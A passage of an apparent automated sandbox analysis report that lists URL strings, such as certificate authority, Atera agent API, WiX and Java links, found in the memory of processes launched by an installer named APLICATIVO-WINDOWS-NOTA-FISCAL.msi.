                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE7C4000.00000002.00000001.01000000.0000004C.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153805E8000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.drString found in binary or memory: http://ocsp.digicert.com0N
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE7C4000.00000002.00000001.01000000.0000004C.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153805E8000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.drString found in binary or memory: http://ocsp.digicert.com0O
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4D0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42E47000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2875938217.0000021648E1E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2898620667.00000216491D0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2904274317.0000021649239000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001C7000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF00241000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000002.2788069108.000002203A8D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000002.2788069108.000002203A8D5000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                Source: AteraAgent.exe, 0000001A.00000002.2901951908.0000021649236000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2904274317.0000021649239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRS
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertAssuredIDRootCA.crlJF
                                Source: AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B02B000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2875938217.0000021648E51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                                Source: AteraAgent.exe, 0000001A.00000002.2875938217.0000021648E51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crlW
                                Source: AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B09B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crlj$
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://openjdk.java.net/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://openjdk.java.net/legal/
                                Source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2788069108.000002203A8AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://packagesstore.blob.core.windows.net
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4CCAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A21000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C429EC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C429F0000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ps.atera.com
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B44000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ps.pndsn.com
                                Source: AteraAgent.exe, 0000000D.00000002.2384950146.0000021C5B583000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
                                Source: AteraAgent.exe, 0000000C.00000002.1755843182.000001779F869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org
                                Source: AteraAgent.exe, 0000000C.00000002.1755843182.000001779F869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                                Source: AteraAgent.exe, 0000000C.00000002.1755843182.000001779F869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceProcess
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4CCAB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2123394942.000001F735D72000.00000002.00000001.01000000.00000024.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                                Source: rundll32.exe, 00000004.00000002.1702577102.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1702577102.0000000004CA4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42751000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004D54000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1981577832.0000021500135000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.1981546902.0000015E00079000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216304E1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE452000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2059219762.0000022F4CA81000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF00111000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000002.2788069108.000002203A771000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 0000002C.00000002.3063046700.0000021400001000.00000004.00000800.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 0000002F.00000002.2437952320.0000022B826A0000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380001000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2573114268.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2573114268.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E22003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4CCAB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.drString found in binary or memory: http://wixtoolset.org
                                Source: rundll32.exe, 00000003.00000003.1660899653.0000000004990000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.000000000474F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004044000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.00000000047F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                                Source: rundll32.exe, 00000003.00000003.1660899653.0000000004990000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.000000000474F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004044000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.00000000047F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/news/
                                Source: rundll32.exe, 00000003.00000003.1660899653.0000000004990000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.000000000474F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004044000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.00000000047F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/releases/
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2121016000.000001F735BF2000.00000002.00000001.01000000.00000021.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E222D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.abit.com.tw/
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4CCAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B3EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
                                Source: AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A76000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A83000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DEE000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42F44000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B22000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.000002163092E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1755843182.000001779F869000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1752871469.000001779DC7F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1762481931.00000177B82C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2392527211.0000021C5B903000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2392527211.0000021C5B928000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B420000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2389101650.0000021C5B8B0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B3EC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B0BB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42E47000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630946000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                Source: AteraAgent.exe, 0000000D.00000002.2384950146.0000021C5B583000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dnie.es/dpc0
                                Source: AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
                                Source: powershell.exe, 0000001F.00000002.2144248955.0000022F64DC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.miMSFTNetFirewallSetting.cmdletDefinition.cdxml
                                Source: powershell.exe, 0000001F.00000002.2149431073.0000022F64F39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2691314024.000002EF74E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c5
                                Source: rundll32.exe, 00000004.00000002.1704657212.00000000075F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.nlog-project.org/schemas/NLog.xsd
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/technetwork/java/javase/jdk-relnotes-index-2162236.html
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/technetwork/java/javase/overview/index.html
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/technetwork/java/javase/terms/license/index.html
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.syntevo.com/smartgit/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.syntevo.com/smartgithg/license.html
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.syntevo.com/static/smart/download/smartgit/smartgit-win32-setup-jre-7_1_1.zip
                                Source: AteraAgent.exe, 0000000C.00000002.1755843182.000001779F869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                                Source: AteraAgent.exe, 0000000C.00000002.1755843182.000001779F869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.oh
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adoptium.net/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adoptopenjdk.net/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adoptopenjdk.net/P
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adoptopenjdk.net/upstream.html.
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.Pr
                                Source: rundll32.exe, 00000004.00000002.1702577102.0000000004CA4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2573114268.0000000004BF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.aterD
                                Source: rundll32.exe, 00000010.00000002.1807492407.0000000004D54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.aterDf
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C429F0000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42751000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004D54000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1981577832.0000021500135000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.1981546902.0000015E00079000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B44000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B7A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE452000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE1D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE421000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE267000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE38A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 0000002C.00000002.3063046700.0000021400001000.00000004.00000800.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 0000002F.00000002.2437952320.0000022B826A0000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com
                                Source: rundll32.exe, 00000003.00000003.1660899653.0000000004990000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1702577102.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1702577102.0000000004CA4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.000000000474F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004D54000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004044000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2573114268.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2573114268.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.00000000047F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/
                                Source: AgentPackageAgentInformation.exe, 00000014.00000002.1981577832.0000021500135000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.1981546902.0000015E00079000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE421000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE267000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE38A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production
                                Source: rundll32.exe, 00000003.00000003.1660899653.0000000004990000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1702577102.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1702577102.0000000004CA4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.000000000474F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C4291B000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004D54000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004044000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2573114268.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 